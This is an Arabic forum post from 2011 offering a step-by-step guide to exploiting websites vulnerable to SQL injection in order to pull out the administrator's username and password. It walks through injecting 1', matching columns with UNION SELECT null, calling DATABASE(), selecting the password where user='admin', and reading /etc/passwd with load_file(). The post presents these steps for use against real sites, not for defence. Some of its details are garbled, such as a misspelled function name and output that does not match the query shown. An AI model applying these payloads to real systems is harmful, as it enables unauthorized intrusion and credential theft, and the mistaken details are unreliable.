SaYe3 Admin
![SaYe3](https://2img.net/u/1111/14/78/18/avatars/1-87.gif)
المساهمات : 144 تاريخ التسجيل : 15/07/2011 الموقع : https://phoenix.ahlamontada.net/u1
![شرح: استغلال المواقع المصابة بثغرة SQL-injection واستخراج يوزر وباسورد الادمن Empty](https://2img.net/i/empty.gif) | موضوع: شرح: استغلال المواقع المصابة بثغرة SQL-injection واستخراج يوزر وباسورد الادمن الإثنين يوليو 18, 2011 6:20 pm | |
| السلام عليكمتنزل مواضيع بالمنتدى مثل بعض المواقع مصابة بهاي الثغرة انتو تردون لاكن بعضكم لايعرفون ان يستغلوهة ونزل عمر شرح استغلالة وماشاءا الله تعلمو اهوايةوهذا شرح هم للفائدةمنقول بس لتستفيدون انا اكدر اسويلكم شرح بس هذا استخراج يوزرو باسورد يلا تابعاول شي خلي اعرفلكم الثغرةبعدين الشرحتعريف [لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] :- هي تقنيه المستخدمة للاستفادة من الضعف اصدار عن اوامر الكترونيه عبر شبكة لتنفيذ التطبيق من قاعدة البيانات الخلفية ( SQL ) وطبعا المهاجمون يعملون علي الاستفادة الحقيقة من هذا الضعف للوصول الي المعلومات السريه الخاص بالموقع الشرح كود: الموقع المستهدف
[لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] </div>
طبعا لكتشاف الخطاء هنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل [****] كود:
1'
</div>
ليكون بالشكل الاتي في HTTP
[****]
كود: [لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ]
</div>
طبعا القاعد لم تستطيع التعرف علي الرمز 1' هيظهر الخطاء ان الامر خطاء هيكون [****] كود: Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in /home/site/index.php on line N </div>
خطاء قواعد البيانات في الداله Warning: mysql_fecth_array():
هنا يمكن الاستغلال مباشر لل SQL-injection وفي نفس الوقت ظهر لينا مكان الموقع علي السيرفر home/site/index.php
بنداء دلوقتي في تطبيق SQL-injection [****] كود: UNION SELECT null/*
</div>
UNION والامر هذا يستخدم لإضافة استعلام اخر تابع للاستعلام المصاب بالثغره SELECT : وهذا الامر عن طريقه يتم استخراج البيانات Null : وهذا الامر لظبط عدد columns مع القاعده وطبعا بتفضل تزود null للربط بالقاعد المهم شوف الفديو ده علي لكي تفهم [لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ]
المهم بعد كده هنجرب نبداء ب null واحده [****]
كود:
[لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] SELECT null/*
</div>
للاسف لم تربط بالقاعده هنجرب 2 null [****] كود:
[لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] SELECT null,null/*
</div>
كده ربط بالقاعده طيب دلوقتي عايزين نعرف Table في القاعده بستخدام الامر DATABASE() وهنضيف الداله دفي اخر null [****] كود:
[لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] SELECT null,DATABASE()/*
</div>
هيكون الناتج [****] كود:
USER()PASSWORD()VERSION()
</div>
طبعا الجداول دي ايوزر بتاع اسم المستخدم و الباسورد بتاع باسورد الادمن وهيكون الاستعلام لستخراج الباسورد [****] كود:
[لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] SELECT null,password /*
</div>
و امر استخراج اليوزر [****]
كود:
[لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] SELECT null,password WHERE user='admin' /*
</div>
البعض هيقول طيب [لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] فاشله علي شان بتجيب الباسورد MD5 لكن هوريك امر يعتبر فيل انكلود وهو بستخدام الامر load_file() وهيكون الاستعلام فيه
[****]
كود: [لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] SELECT null,load_file('/etc/passwd')/*
</div> و الامر ده هيعرض ليك PAsswd يعني يتم الاستغل فيل انكلود وشوف الفديو ده وانت تعرف خطوره الداله file_load شوف الفديو ده [لن تستطيع مشاهدة المحتوى إلا بعد الرد على الموضوع ] تحياتي صايع | |
|